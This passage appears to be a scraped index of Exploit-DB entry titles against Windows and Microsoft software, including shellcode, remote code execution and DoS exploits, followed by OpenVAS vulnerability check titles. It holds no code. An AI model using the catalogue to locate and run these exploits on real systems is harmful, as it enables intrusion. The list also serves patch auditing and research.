download and exec source [13527] Windows 9x/NT/2k/XP PEB method 35 bytes [13526] Windows 9x/NT/2k/XP PEB method 31 bytes [13525] Windows 9x/NT/2k/XP PEB method 29 bytes [13524] Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes [13523] Windows NT/2k/XP useradd shellcode for russian systems 318 bytes [13504] Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs [13283] windows xp/sp1 generate portbind payload [12728] Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability [12524] Windows SMB2 Negotiate Protocol (0x72) Response DoS [12518] Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005 [12450] Microsoft SharePoint Server 2007 XSS Vulnerability [12337] Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability [12336] Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability [12273] Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC [12119] WINDOWS FTP SERVER by DWG (Auth Bypass) [12079] Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit [12032] Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution [11683] Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta) [11531] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit [11276] Microsoft Internet Explorer 6.0/7.0 NULL pointer crashes [11214] Windows Live Messenger 2009 ActiveX Heap Overflow PoC [11199] Windows NT User Mode to Ring 0 Escalation Vulnerability [11070] Windows Live Messenger 2009 ActiveX DoS Vulnerability [11034] Microsoft HTML Help Compiler (hhc.exe) BOF PoC [10791] Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x [10747] Mini-Stream Exploit for Windows XP SP2 and SP3 [10375] SAP GUI for Windows sapirrfc.dll Activex Overflow Exploit [10005] Windows 7 / Server 2008R2 Remote Kernel Crash [9893] Microsoft Internet Explorer 5,6,7 - Memory Corruption PoC [9596] SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH) [9594] Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln [9592] SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta) [9587] Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [9586] SIDVault 2.0e Windows Remote Buffer Overflow Exploit [9559] Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4) [9541] Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k) [9516] Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability [9417] MS Windows 2003 (EOT File) BSOD Crash Exploit [9163] Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC [9117] HTC / Windows Mobile OBEX FTP Service Directory Traversal Vuln [9100] Microsoft Internet Explorer (AddFavorite) Remote Crash PoC [9093] windows live messenger plus! fileserver 1.0 - Directory Traversal vuln [8832] ICQ 6.5 URL Search Hook (Windows Explorer) Remote BOF PoC [8806] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl) [8765] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php) [8754] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch) [8704] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability [8467] Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulns [8466] Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC [8465] Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit [8445] MS Windows Media Player (.mid File) Integer Overflow PoC [8281] Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC [7910] WOW - Web On Windows ActiveX Control 2 Remote Code Execution [7727] Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit [7720] MS Windows (.CHM File) Denial of Service (html compiled) [7585] MS Windows Media Player - (.WAV) Remote Crash PoC [7501] Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit [7262] Microsoft Office Communicator (SIP) Remote Denial of Service Exploit [7217] Quicksilver Forums <= 1.4.2 RCE Exploit (windows only) [7196] Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069 [7132] MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) [7104] MS Windows Server Service Code Execution Exploit (MS08-067) [6841] MS Windows Server Service Code Execution Exploit (MS08-067) (Univ) [6824] MS Windows Server Service Code Execution PoC (MS08-067) [6757] MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) [6732] MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046) [6716] MS Windows GDI+ Proof of Concept (MS08-052) #2 [6705] MS Windows 2003 Token Kidnapping Local Exploit PoC [6699] Microsoft PicturePusher ActiveX Cross Site File Upload Attack PoC [6671] MS Windows Vista Access Violation from Limited Account Exploit (BSoD) [6656] MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021 [6616] MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit [6588] MS Windows GDI+ (.ico File) Remote Division By Zero Exploit [6582] Windows Mobile 6.0 Device long name Remote Reboot Exploit [6565] K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer DoS PoC [6560] MS Windows Wordpad .doc File Local Denial of Service PoC [6463] MS Windows WRITE_ANDX SMB command handling Kernel DoS (meta) [6454] Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) [6330] Micrsoft Windows GDI (CreateDIBPatternBrushPt) Heap Overflow PoC [6317] Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit [6244] Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC [6181] RealVNC Windows Client 4.1.2 - Remote DoS Crash PoC [6124] Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit [5951] XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC [5563] TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit [5530] Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit [5518] MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025) [5460] Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC [5442] MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021) [5349] Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC [5327] MS Windows Explorer Unspecified .DOC File Denial of Service Exploit [5320] Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016) [5314] TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day) [5287] Microsoft Office Excel Code Execution Exploit (MS08-014) [5107] Microsoft Office .WPS File Stack Overflow Exploit (MS08-011) [5087] Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit [4948] Windows RSH daemon <= 1.8 - Remote Buffer Overflow Exploit [4934] MS Windows Message Queuing Service RPC BOF Exploit (dnsname) [4892] Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit [4874] Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method [4873] Microsoft FoxServer (vfp6r.dll 6.0.8862.0) ActiveX Command Execution [4866] Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit [4760] MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065) [4745] MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) [4702] Windows Media Player 6.4 MP4 File Stack Overflow PoC [4682] Windows Media Player AIFF Divide By Zero Exception DoS PoC [4625] Microsoft Jet Engine MDB File Parsing Stack Overflow PoC [4616] Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055) [4506] Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution [4431] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit [4398] Microsoft SQL Server Distributed Management Objects BoF Exploit [4394] Microsoft Visual Studio 6.0 (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit [4393] Microsoft Visual Studio 6.0 (PDWizard.ocx) Remote Command Execution [4379] Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF [4369] Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote PoC [4361] Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit [4337] MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046) [4325] XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit [4279] Microsoft DXMedia SDK 6 (SourceUrl) ActiveX Remote Code Execution [4259] Microsoft Visual 6 (VDT70.DLL NotSafe) Stack Overflow Exploit [4222] Windows RSH daemon 1.7 - Remote Buffer Overflow Exploit [4215] MS Windows Explorer.exe Gif Image Denial of Service Exploit [4205] TeamSpeak 2.0 (Windows Release) Remote Denial of Service Exploit [4121] Microsoft Excel 2000/2003 Sheet Name Vulnerability PoC [4067] Microsoft Office MSODataSourceControl COM-object BoF PoC (0day) [4066] Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2) [4065] Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4) [4061] Safari 3 for Windows Beta Remote Command Execution PoC [4044] MS Windows GDI+ ICO File - Remote Denial of Service Exploit [4016] Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit [3977] Microsoft Visual Basic 6.0 Project (Description) Stack overflow PoC [3976] Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC [3973] Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit [3965] Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial of Service Exploit [3926] MS Windows Vista - Forged ARP packet Network Stack DoS Exploit [3804] MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) [3755] MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2 [3740] MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit [3738] XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit [3737] MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) [3695] MS Windows Animated Cursor (.ANI) Local Overflow Exploit [3693] MS Windows .HLP File Local HEAP Overflow PoC 0day [3690] microsoft office word 2007 - Multiple Vulnerabilities [3688] MS Windows GDI Local Privilege Escalation Exploit (MS07-017) [3684] MS Windows Explorer Unspecified .ANI File Denial of Service Exploit [3652] MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP) [3651] MS Windows Animated Cursor (.ANI) Universal Exploit Generator [3647] MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit [3636] MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass) [3635] MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2 [3634] MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit [3617] MS Windows Animated Cursor (.ANI) Stack Overflow Exploit [3575] Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows) [3544] Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit [3453] MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption [3419] MS Windows (.doc File) Malformed Pointers Denial of Service Exploit [3260] Microsoft Word 2000 Unspecified Code Execution Exploit (0day) [3193] Microsoft Excel Malformed Palette Record DoS PoC (MS07-002) [3190] MS Windows Explorer (AVI) Unspecified Denial of Service Exploit [3176] Microsoft Visual C++ (.RC Resource Files) Local Buffer Overflow Exploit [3159] Microsoft Help Workshop 4.03.0002 (.HPJ) Buffer Overflow Exploit [3149] Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit [3111] MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit [3071] Microsoft Vista (NtRaiseHardError) Privilege Escalation Exploit [3052] MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free [3024] MS Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit [3022] MS Windows ASN.1 - Remote Exploit (MS04-007) [3013] MS Windows NetrWkstaUserEnum() Remote DoS Exploit (0day) [2967] MS Windows (MessageBox) Memory Corruption Local Denial of Service [2935] Windows Media Player 9/10 (MID File) Denial of Service Exploit [2922] Microsoft Word Document (malformed pointer) Proof of Concept [2900] MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041) [2879] MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day) [2809] MS Windows NetpManageIPCConnect Stack Overflow Exploit (py) [2800] MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070) [2789] MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070) [2682] MS Windows NAT Helper Components Remote DoS Exploit (perl) [2672] MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit [2523] Microsoft Office 2003 PPT Local Buffer Overflow PoC [2412] MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049) [2355] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3) [2265] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2) [2231] Simple Machines Forum <= 1.1 rc2 (lngfile) Remote Exploit (windows) [2223] MS Windows CanonicalizePathName() Remote Exploit (MS06-040) [2210] MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2) [2204] MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) [2194] MS Windows PNG File IHDR Block Denial of Service Exploit PoC [2162] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) [2091] Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit (french) [2057] MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035) [2056] Microsoft IIS ASP Stack Overflow Exploit (MS06-034) [2054] MS Windows DHCP Client Broadcast Attack Exploit (MS06-036) [2001] Microsoft Word 2000/2003 Unchecked Boundary Condition Vulnerability [1999] Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC [1988] Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian) [1986] Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french) [1978] Microsoft Excel Universal Hlink Local Buffer Overflow Exploit [1967] MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit [1965] MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) [1958] Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit [1944] Microsoft Excel Unspecified Remote Code Execution Exploit [1940] MS Windows RRAS Remote Stack Overflow Exploit (MS06-025) [1927] Microsoft Excel Unicode Local Overflow Exploit PoC [1911] MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030) [1910] MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030) [1603] MS Windows XP/2003 - (IGMP v3) Denial of Service Exploit (MS06-007) (2) [1599] MS Windows XP/2003 (IGMP v3) - Denial of Service Exploit (MS06-007) [1584] MS Windows Telephony Service Command Execution Exploit (MS05-040) [1520] MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3) [1506] MS Windows Color Management Module Overflow Exploit (MS05-036) (2) [1505] MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006) [1504] MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta) [1502] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2) [1500] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) [1495] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (3) [1490] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (new) [1488] Microsoft HTML Help Workshop (.hhp file) Denial of Service [1470] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit [1465] MS Windows Services ACLs Local Privilege Escalation Exploit (updated) [1420] MS Windows Metafile (WMF) Remote File Download Exploit Generator [1407] MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055) [1396] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp) [1391] Windows XP/2003 Metafile Escape() Code Execution Exploit (meta) [1377] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl) [1376] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c) [1346] MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053) [1343] MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053) [1341] MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051) [1328] MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit [1287] GO-Global Windows Server <= 3.1.0.3270 Buffer Overflow (PoC) [1286] GO-Global Windows Clients <= 3.1.0.3270 Buffer Overflow (PoC) [1271] MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2) [1269] MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) [1260] MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta) [1198] MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018) [1197] MS Windows (keybd_event) Local Privilege Elevation Exploit [1180] MS Windows Plug-and-Play Service Remote Universal Exploit (french fix) [1179] MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix) [1178] MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit [1149] MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039) [1147] Veritas Backup Exec Remote File Access Exploit (windows) [1146] MS Windows Plug-and-Play Service Remote Overflow (MS05-039) [1143] MS Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit [1128] MS Windows (LegitCheckControl.dll) Genuine Advantage Validation Patch [1116] MS Windows Color Management Module Overflow Exploit (MS05-036) [1104] MS Windows Netman Service Local Denial of Service Exploit [1075] MS Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3) [1065] MS Windows (SMB) Transaction Response Handling Exploit (MS05-011) [1019] MS Windows COM Structured Storage Local Exploit (MS05-012) [1000] MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit [976] MS Windows WINS Vulnerability and OS/SP Scanner [942] MS Windows Malformed IP Options DoS Exploit (MS05-019) [938] MS Windows (HTA) Script Execution Exploit (MS05-016) [909] MS Windows (WINS) Remote Buffer Overflow Exploit (v.3) [861] MS Windows XP/2003 Remote Denial of Service Exploit [749] MS Windows Improper Token Validation Local Exploit (working) [734] MS Windows NetDDE Remote Buffer Overflow Exploit (MS04-031) [733] MS Windows 2000 WINS Remote Code Execution Exploit [721] MS Windows Kernel ANI File Parsing Crash Vulnerability [640] MS Windows Compressed Zipped Folders Exploit (MS04-034) [585] MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030) [584] MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032) [578] MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036) [556] MS Windows JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload [480] MS Windows JPEG GDI+ Remote Heap Overflow Exploit (MS04-028) [478] MS Windows JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028) [475] MS Windows JPEG GDI+ Overflow Administrator Exploit (MS04-028) [474] MS Windows JPEG Processing Buffer Overrun Exploit (MS04-028) [472] MS Windows JPEG GDI+ Overflow Shellcoded Exploit [368] MS Windows XP Task Scheduler (.job) Universal Exploit (MS04-022) [366] MS Windows SMS 2.0 - Denial of Service Exploit [355] MS Windows 2k Utility Manager (All-In-One) Exploit (MS04-019) [353] MS Windows 2K/XP Task Scheduler .job Exploit (MS04-022) [352] MS Windows 2000 Universal Language Utility Manager Exploit (MS04-019) [351] MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020) [350] MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019) [329] MS Windows NT Crash with an Extra Long Username DoS Exploit [295] MS Windows XP/2K Lsasrv.dll Remote Universal Exploit (MS04-011) [293] MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011) [276] MS Windows 2K/XP TCP Connection Reset Remote Attack Tool [275] MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011) [271] MS Windows Utility Manager Local SYSTEM Exploit (MS04-011) [268] MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2) [266] MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit [214] MS Windows (Jolt2.c) Denial of Service Exploit [176] MS Windows IIS SSL Remote Denial of Service Exploit (MS04-011) [163] Eudora 6.0.3 Attachment Spoofing Exploit (windows) [153] MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007) [148] MS Windows XP/2003 Samba Share Resource Exhaustion Exploit [135] MS Windows Messenger Service Remote Exploit FR (MS03-043) [130] MS Windows XP Workstation Service Remote Exploit (MS03-049) [123] MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049) [122] MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045) [119] MS Windows 2000/XP Workstation Service Overflow (MS03-049) [117] MS Windows XP/2000 RPC Remote (non exec memory) Exploit [111] MS Windows Messenger Service Denial of Service Exploit (MS03-043) [109] MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) [103] MS Windows (RPC DCOM2) Remote Exploit (MS03-039) [100] MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) [97] MS Windows (RPC DCOM) Scanner (MS03-039) [92] Microsoft WordPerfect Document Converter Exploit (MS03-036) [86] Real Server 7/8/9 Remote Root Exploit (Windows & Linux) [81] MS Windows 2000 RSVP Server Authority Hijacking PoC Exploit [76] MS Windows (RPC DCOM) Remote Exploit (Universal Targets) [70] MS Windows (RPC DCOM) Remote Exploit (48 Targets) [69] MS Windows RPC DCOM Remote Exploit (18 Targets) [66] MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets) [65] MS Windows SQL Server Denial of Service Remote Exploit (MS03-031) [64] MS Windows (RPC DCOM) Remote Buffer Overflow Exploit [61] MS Windows 2000 RPC DCOM Interface DoS Exploit [56] MS Windows Media Services (nsiislog.dll) Remote Exploit [51] MS Windows WebDav III remote root Exploit (xwdav) [48] MS Windows Media Services Remote Exploit (MS03-022) [36] MS Windows WebDav II (New) Remote Root Exploit [35] MS Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit [32] MS Windows XP (explorer.exe) Buffer Overflow Exploit [23] Real Server < 8.0.2 - Remote Exploit (Windows Platforms) [20] MS Windows SMB Authentication Remote Exploit [5] MS Windows RPC Locator Service Remote Exploit [2] MS Windows WebDAV Remote PoC Exploit [1] MS Windows WebDAV (ntdll.dll) Remote Exploit OpenVAS (Nessus) - http://www.openvas.org: [903041] Microsoft Windows Kernel Privilege Elevation Vulnerability (2724197) [903036] Microsoft Windows Networking Components Remote Code Execution Vulnerabilities (2733594) [903035] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2731847) [903033] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2718523) [902936] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2783534) [902933] Microsoft Windows Shell Remote Code Execution Vulnerabilities (2727528) [902916] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167) [902909] Microsoft Windows Service Pack Missing Multiple Vulnerabilities [902908] Microsoft Windows DirectWrite Denial of Service Vulnerability (2665364) [902906] Microsoft Windows DNS Server Denial of Service Vulnerability (2647170) [902900] Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584) [902846] Microsoft Windows TLS Protocol Information Disclosure Vulnerability (2655992) [902845] Microsoft Windows Shell Remote Code Execution Vulnerability (2691442) [902829] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258) [902807] Microsoft Windows Media Could Allow Remote Code Execution Vulnerabilities (2636391) [902784] Microsoft Windows Object Packager Remote Code Execution Vulnerability (2603381) [902783] Microsoft Windows Kernel Security Feature Bypass Vulnerability (2644615) [902782] MicroSoft Windows Server Service Remote Code Execution Vulnerability (921883) [902766] Microsoft Windows Kernel Privilege Elevation Vulnerability (2633171) [902694] Microsoft Windows IIS FTP Service Information Disclosure Vulnerability (2761226) [902693] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2761226) [902687] Microsoft Windows Data Access Components Remote Code Execution Vulnerability (2698365) [902677] Microsoft Windows Prtition Manager Privilege Elevation Vulnerability (2690533) [902676] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (2688338) [902609] Microsoft Windows CSRSS Privilege Escalation Vulnerabilities (2507938) [902598] Microsoft Windows Time Component Remote Code Execution Vulnerability (2618451) [902597] Microsoft Windows Media Remote Code Execution Vulnerability (2648048) [902596] Microsoft Windows OLE Remote Code Execution Vulnerability (2624667) [902588] Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability [902566] Microsoft Windows WINS Local Privilege Escalation Vulnerability (2571621) [902516] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902484] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (2588516) [902463] Microsoft Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2567680) [902440] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2536275) [902425] Microsoft Windows SMB Accessible Shares [902403] Microsoft Windows Fraudulent Digital Certificates Spoofing Vulnerability [902377] Microsoft Windows OLE Automation Remote Code Execution Vulnerability (2476490) [902337] Microsoft Windows Kernel Elevation of Privilege Vulnerability (2393802) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [902289] Microsoft Windows LSASS Privilege Escalation Vulnerability (2478960) [902281] Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910) [902280] Microsoft Windows BranchCache Remote Code Execution Vulnerability (2385678) [902277] Microsoft Windows Netlogon Service Denial of Service Vulnerability (2207559) [902276] Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420) [902269] Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468) [902263] Microsoft Windows Media Player Network Sharing Remote Code Execution Vulnerability (2281679) [902262] Microsoft Windows Shell and WordPad COM Validation Vulnerability (2405882) [902256] Microsoft Windows win32k.sys Driver 'CreateDIBPalette()' BOF Vulnerability [902232] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (978886) [902231] Microsoft Windows Tracing Feature Privilege Elevation Vulnerabilities (982799) [902227] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [902226] Microsoft Windows Shell Remote Code Execution Vulnerability (2286198) [902094] Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) [902093] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (981852) [902067] Microsoft Windows Kernel Mode Drivers Privilege Escalation Vulnerabilities (979559) [902033] Microsoft Windows '.ani' file Denial of Service vulnerability [901305] Microsoft Windows IP-HTTPS Component Security Feature Bypass Vulnerability (2765809) [901304] Microsoft Windows File Handling Component Remote Code Execution Vulnerability (2758857) [901301] Microsoft Windows Kerberos Denial of Service Vulnerability (2743555) [901212] Microsoft Windows DirectPlay Remote Code Execution Vulnerability (2770660) [901211] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2720573) [901209] Microsoft Windows Media Center Remote Code Execution Vulnerabilities (2604926) [901205] Microsoft Windows Components Remote Code Execution Vulnerabilities (2570947) [901193] Microsoft Windows Media Remote Code Execution Vulnerabilities (2510030) [901169] Microsoft Windows Address Book Remote Code Execution Vulnerability (2423089) [901164] Microsoft Windows SChannel Denial of Service Vulnerability (2207566) [901163] Microsoft Windows Media Player Remote Code Execution Vulnerability (2378111)) [901150] Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability(2347290) [901140] Microsoft Windows SMB Code Execution and DoS Vulnerabilities (982214) [901119] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (980218) [901102] Microsoft Windows Media Services Remote Code Execution Vulnerability (980858) [901065] Microsoft Windows IAS Remote Code Execution Vulnerability (974318) [901064] Microsoft Windows ADFS Remote Code Execution Vulnerability (971726) [901063] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [901012] Microsoft Windows Media Format Remote Code Execution Vulnerability (973812) [900965] Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability [900963] Microsoft Windows Kernel Privilege Escalation Vulnerability (971486) [900957] Microsoft Windows Patterns & Practices EntLib DOS Vulnerability [900956] Microsoft Windows Patterns & Practices EntLib Version Detection [900908] Microsoft Windows Message Queuing Privilege Escalation Vulnerability (971032) [900907] Microsoft Windows AVI Media File Parsing Vulnerabilities (971557) [900886] Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (969947) [900881] Microsoft Windows Indexing Service ActiveX Vulnerability (969059) [900880] Microsoft Windows ATL COM Initialization Code Execution Vulnerability (973525) [900879] Microsoft Windows Media Player ASF Heap Overflow Vulnerability (974112) [900877] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [900876] Microsoft Windows CryptoAPI X.509 Spoofing Vulnerabilities (974571) [900873] Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness (971888) [900838] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (967723) [900814] Microsoft Windows WINS Remote Code Execution Vulnerability (969883) [900757] Microsoft Windows Media Player '.AVI' File DOS Vulnerability [900740] Microsoft Windows Kernel Could Allow Elevation of Privilege (977165) [900568] Microsoft Windows Search Script Execution Vulnerability (963093) [900465] Microsoft Windows DNS Memory Corruption Vulnerability - Mar09 [900404] Microsoft Windows RTCP Unspecified Remote DoS Vulnerability [900336] Microsoft Windows Media Player MID File Integer Overflow Vulnerability [900297] Microsoft Windows Kernel Denial of Service Vulnerability (2556532) [900296] Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) [900295] Microsoft Windows DNS Server Remote Code Execution Vulnerability (2562485) [900281] Microsoft IE Developer Tools WMITools and Windows 